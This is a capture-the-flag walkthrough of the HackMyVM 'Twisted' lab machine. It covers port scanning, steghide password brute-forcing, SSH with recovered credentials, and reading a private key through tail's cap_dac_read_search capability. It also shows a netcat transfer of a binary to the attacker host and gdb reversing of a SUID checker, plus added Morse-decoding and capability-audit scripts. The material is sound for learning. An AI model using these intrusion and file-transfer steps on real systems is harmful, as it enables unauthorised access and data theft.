HackMyVM | Twisted

In this walkthrough, I demonstrate how I obtained complete ownership of Twisted from HackMyVM.
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my untrusted hosts from platforms like HackMyVM on a segmented VLAN (10.9.9.0/24) that has no internet access.

Nmap Results

# Nmap 7.94SVN scan initiated Sat Dec 21 01:30:18 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.13
Nmap scan report for 10.9.9.13
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
|   256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_  256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 21 01:30:26 2024 -- 1 IP address (1 host up) scanned in 7.82 seconds

Service Enumeration

TCP/80

The two images on the site index are two different files. I'm not going to get into possible steganalysis just yet, but I'll download them for review later.
wget http://10.9.9.13/cat-original.jpg
wget http://10.9.9.13/cat-hidden.jpg



robots.txt

ℹ️
Using gobuster, I didn't find any additional directories or files under the site root or /nothing.



Steganalysis

file cat-original.jpg
file cat-hidden.jpg

Determine the file type and test for irregularities

binwalk cat-original.jpg
binwalk cat-hidden.jpg

Use binwalk to detect any kind of media embedded in the file

exiftool -a -e -u -U cat-original.jpg
exiftool -a -e -u -U cat-hidden.jpg

Check the image metadata for any comments or other irregularities

ls -l cat-original.jpg
ls -l cat-hidden.jpg

Determine the file size to see if the files are identical

💡
At this point, file and binwalk don't reveal anything significant. However, ls -l shows that cat-hidden.jpg is slightly larger by 13 bytes. We can probably assume some data has been embedded in cat-hidden.jpg and that we'll need a password to extract it.
awk '{ c = "steghide extract -sf cat-hidden.jpg -p " $1 " 2>/dev/null" ; if (system(c) == 0) { print "Password found: " $1;  exit } }' < ~/Pentest/WordLists/rockyou.txt && echo "steghide extracted data to: $(find . -type f -ctime -0.01)"

awk is an excellent choice for brute-forcing stego challenges with large password lists, as it is extremely fast. With this one-liner, we're reading rockyou.txt and feeding that to steghide. If a valid password is found, print it and exit the awk script. Then, print the file steghide extracted to.

If I had to guess, the username is mateo and the password is either sexymama or thisismypassword. I'd wager we'll have access via the SSH server on tcp/2222.

Exploit

SSH as Mateo

I tried both passwords, sexymama first, which failed.

Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
    
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

Current User

uid=1000(mateo) gid=1000(mateo) groups=1000(mateo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

-bash: sudo: command not found    



Users and Groups

Local Users

mateo:x:1000:1000:mateo,,,:/home/mateo:/bin/bash
markus:x:1001:1001:,,,:/home/markus:/bin/bash
bonita:x:1002:1002:,,,:/home/bonita:/bin/bash    

Local Groups

cdrom:x:24:mateo
floppy:x:25:mateo
audio:x:29:mateo
dip:x:30:mateo
video:x:44:mateo
plugdev:x:46:mateo
netdev:x:109:mateo
mateo:x:1000:
markus:x:1001:
bonita:x:1002:    



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:e8:57:b1 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.13/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 6532sec preferred_lft 6532sec
    inet6 fe80::be24:11ff:fee8:57b1/64 scope link 
       valid_lft forever preferred_lft forever    



Interesting Files

/home/mateo/note.txt

/var/www/html/gogogo.wav  

SUID File

find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null
-rwsrws--- 1 root bonita 16864 Oct 14  2020 /home/bonita/beroot

Privilege Escalation

WAV File Analysis

file /var/www/html/gogogo.wav
/var/www/html/gogogo.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11050 Hz
scp -P 2222 mateo@10.9.9.13:/var/www/html/gogogo.wav .

Copy the file locally to Kali for further analysis

💡
Listening to the audio, it's a series of pulses and silence, which clearly indicates the use of Morse code. We need to convert the Morse code audio to text and then convert the text to human readable characters.
https://morsefm.com/
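As an added example (not the author's code and not the morsefm.com tool): a Python decoder for 8-bit mono PCM WAV Morse audio of the kind gogogo.wav was identified as, together with a constructed synthesizer so it can be exercised offline. It thresholds the signal envelope per 5 ms window, measures the on/off run lengths, and classifies them with standard Morse timing (dot 1 unit, dash 3, intra-letter gap 1, letter gap 3, word gap 7); the 11050 Hz rate, 700 Hz tone and 60 ms unit are assumptions for the synthetic sample only.

```python
import io, math, wave
from itertools import groupby
# International Morse table (letters and digits) and its reverse lookup.
MORSE = dict(zip("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", (
    ".- -... -.-. -.. . ..-. --. .... .. .--- -.- .-.. -- -. --- .--. --.- "
    ".-. ... - ..- ...- .-- -..- -.-- --.. ----- .---- ..--- ...-- ....- "
    "..... -.... --... ---.. ----.").split()))
FROM_MORSE = {v: k for k, v in MORSE.items()}

def tone_windows(wav_bytes, win_ms=5):
    """Slice 8-bit mono PCM into windows; True where a tone is present."""
    with wave.open(io.BytesIO(wav_bytes)) as w:
        assert w.getsampwidth() == 1 and w.getnchannels() == 1
        rate, raw = w.getframerate(), w.readframes(w.getnframes())
    win = max(1, rate * win_ms // 1000)
    energy = [sum(abs(b - 128) for b in raw[i:i + win]) / win
              for i in range(0, len(raw), win)]
    thresh = max(energy) / 2      # unsigned 8-bit silence is 128 -> energy 0
    return [e > thresh for e in energy]

def decode_morse_wav(wav_bytes):
    """Group on/off windows into runs, classify by length, map to text."""
    runs = [(on, len(list(g))) for on, g in groupby(tone_windows(wav_bytes))]
    unit = min(n for on, n in runs if on)   # shortest tone = one dot (1u)
    symbols, out = "", []
    for on, n in runs:
        if on:
            symbols += "." if n < 2 * unit else "-"      # dash = 3u
        elif symbols and n >= 2 * unit:     # letter gap (3u) or word gap (7u)
            out += [FROM_MORSE.get(symbols, "?"), " " if n >= 5 * unit else ""]
            symbols = ""
    if symbols: out.append(FROM_MORSE.get(symbols, "?"))
    return "".join(out).strip()

def make_morse_wav(text, rate=11050, unit_ms=60, freq=700):
    """Constructed sample: synthesize 8-bit mono PCM Morse for the given text."""
    unit, pcm = rate * unit_ms // 1000, bytearray()
    for wi, word in enumerate(text.upper().split()):
        pcm += b"\x80" * (7 * unit * bool(wi))           # word gap
        for li, ch in enumerate(word):
            pcm += b"\x80" * (3 * unit * bool(li))       # letter gap
            for si, sym in enumerate(MORSE[ch]):
                pcm += b"\x80" * (unit * bool(si))       # intra-letter gap
                for i in range((1 if sym == "." else 3) * unit):
                    pcm.append(128 + int(100 * math.sin(2 * math.pi * freq * i / rate)))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1); w.setsampwidth(1); w.setframerate(rate)
        w.writeframes(bytes(pcm))
    return buf.getvalue()
```

To run it on a real capture, pass `open("gogogo.wav", "rb").read()` to `decode_morse_wav`; noisy recordings may need a different window size or threshold.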



Pivot to Markus

💡
I wasn't having any luck with the privilege escalation as mateo, so I went back and tried the same steganalysis on cat-original.jpg and found another username and password.
ssh -p 2222 markus@10.9.9.13
ℹ️
From here, we repeat the post-exploit enumeration process.



Interesting Files

/home/markus/note.txt

Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
The file is unreadable to markus. I was unable to find a SUID binary that could read it, but there is a binary with a file capability that bypasses the permission checks:
/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/tail = cap_dac_read_search+ep
Overview of Linux capabilities
Linux capabilities provide a way to separate privileged actions. This overview shows the available Linux capabilities and their purpose.
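As an added defender-side check (not part of the original walkthrough): a small audit over `getcap -r` output that flags file capabilities able to bypass DAC permission checks, such as the cap_dac_read_search on /usr/bin/tail above, or that are otherwise root-equivalent. It assumes the classic `path = caps` output format shown on the page; the sample output below is constructed.

```python
import re

# File capabilities that let a binary read or write files regardless of their
# mode bits / ownership, or that are otherwise a short path to root.
DAC_BYPASS = {"cap_dac_read_search", "cap_dac_override"}
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                   "cap_sys_module", "cap_chown", "cap_fowner"}

# Constructed sample of `getcap -r / 2>/dev/null` output, one file per line.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
/usr/bin/python3.7 = cap_setuid+ep
/usr/sbin/somedaemon = cap_net_bind_service+ei
"""

def parse_getcap_line(line):
    """Return (path, {cap: set(flags)}) for one classic-format getcap line."""
    path, sep, spec = line.strip().partition(" = ")
    if not sep:
        return None
    caps = {}
    for clause in spec.split():              # clause: "cap_a,cap_b+ep"
        m = re.fullmatch(r"([\w,]+)([+=])(\w*)", clause)
        if not m:
            continue
        for name in m[1].split(","):
            caps[name] = set(m[3])           # flags: e(ffective) p(ermitted) i(nheritable)
    return path, caps

def audit_getcap(output):
    """Return [(path, cap, reason)] for capabilities worth a closer look."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        for cap, flags in caps.items():
            if "e" not in flags and "p" not in flags:
                continue                     # inheritable-only: inert unless inherited
            if cap in DAC_BYPASS:
                findings.append((path, cap, "bypasses file permission checks"))
            elif cap in ROOT_EQUIVALENT:
                findings.append((path, cap, "root-equivalent capability"))
    return findings
```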



Lateral to Bonita

/usr/bin/tail -n 10000 /var/cache/apt/id_rsa > /home/markus/id_rsa
chmod 600 /home/markus/id_rsa
ssh -i /home/markus/id_rsa -p 2222 bonita@localhost
💡
Now, we can come back to that SUID binary we enumerated earlier as mateo.
This seems like a simple string comparison and should be easy to debug with gdb.



Becoming Root

Transfer the Binary to Kali

nc -q 3 -lnvp 50443 > beroot

Start a listener on Kali to catch the file

nc -q 3 -nv 10.6.6.9 50443 < beroot

Transfer the file to Kali by connecting to the listener

chmod +x beroot
gdb beroot
(gdb) break main
(gdb) run
(gdb) disassemble main
The cmp instruction compares the immediate value 0x16f8 with our input, which is held in the EAX register; if the two are equal, the conditional jump continues to the next block of main().
The decimal value of 0x16f8 is 5880, so that is likely the code to enter.



Flags

User

HMVblackcat    

Root

HMVwhereismycat    
More from 0xBEN